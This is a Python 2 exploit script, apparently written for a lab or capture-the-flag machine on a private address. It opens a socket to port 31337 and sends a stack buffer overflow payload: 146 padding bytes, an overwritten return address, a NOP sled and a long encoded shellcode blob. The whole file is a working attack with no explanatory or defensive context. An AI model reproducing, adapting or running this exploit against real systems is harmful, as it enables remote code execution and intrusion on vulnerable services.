exploit.py

#!/usr/bin/env python2
import socket

RHOST = "192.168.56.112"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

shellcode = ("\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x52\xbe\xd3\xb0\x95"
"\x6b\x83\xeb\xfc\x31\x73\x13\x03\xa0\xa3\x77\x9e\xba\x2c\xf5"
"\x61\x42\xad\x9a\xe8\xa7\x9c\x9a\x8f\xac\x8f\x2a\xdb\xe0\x23"
"\xc0\x89\x10\xb7\xa4\x05\x17\x70\x02\x70\x16\x81\x3f\x40\x39"
"\x01\x42\x95\x99\x38\x8d\xe8\xd8\x7d\xf0\x01\x88\xd6\x7e\xb7"
"\x3c\x52\xca\x04\xb7\x28\xda\x0c\x24\xf8\xdd\x3d\xfb\x72\x84"
"\x9d\xfa\x57\xbc\x97\xe4\xb4\xf9\x6e\x9f\x0f\x75\x71\x49\x5e"
"\x76\xde\xb4\x6e\x85\x1e\xf1\x49\x76\x55\x0b\xaa\x0b\x6e\xc8"
"\xd0\xd7\xfb\xca\x73\x93\x5c\x36\x85\x70\x3a\xbd\x89\x3d\x48"
"\x99\x8d\xc0\x9d\x92\xaa\x49\x20\x74\x3b\x09\x07\x50\x67\xc9"
"\x26\xc1\xcd\xbc\x57\x11\xae\x61\xf2\x5a\x43\x75\x8f\x01\x0c"
"\xba\xa2\xb9\xcc\xd4\xb5\xca\xfe\x7b\x6e\x44\xb3\xf4\xa8\x93"
"\xb4\x2e\x0c\x0b\x4b\xd1\x6d\x02\x88\x85\x3d\x3c\x39\xa6\xd5"
"\xbc\xc6\x73\x79\xec\x68\x2c\x3a\x5c\xc9\x9c\xd2\xb6\xc6\xc3"
"\xc3\xb9\x0c\x6c\x69\x40\xc7\x53\xc6\x72\x70\x3c\x15\x82\x7f"
"\x07\x90\x64\x15\x67\xf5\x3f\x82\x1e\x5c\xcb\x33\xde\x4a\xb6"
"\x74\x54\x79\x47\x3a\x9d\xf4\x5b\xab\x6d\x43\x01\x7a\x71\x79"
"\x2d\xe0\xe0\xe6\xad\x6f\x19\xb1\xfa\x38\xef\xc8\x6e\xd5\x56"
"\x63\x8c\x24\x0e\x4c\x14\xf3\xf3\x53\x95\x76\x4f\x70\x85\x4e"
"\x50\x3c\xf1\x1e\x07\xea\xaf\xd8\xf1\x5c\x19\xb3\xae\x36\xcd"
"\x42\x9d\x88\x8b\x4a\xc8\x7e\x73\xfa\xa5\xc6\x8c\x33\x22\xcf"
"\xf5\x29\xd2\x30\x2c\xea\xf2\xd2\xe4\x07\x9b\x4a\x6d\xaa\xc6"
"\x6c\x58\xe9\xfe\xee\x68\x92\x04\xee\x19\x97\x41\xa8\xf2\xe5"
"\xda\x5d\xf4\x5a\xda\x77")

buf = ""
buf += "A" * 146 + "\xc3\x14\x04\x08" + "\x90" * 16 + shellcode  
buf += "\n"

s.send(buf)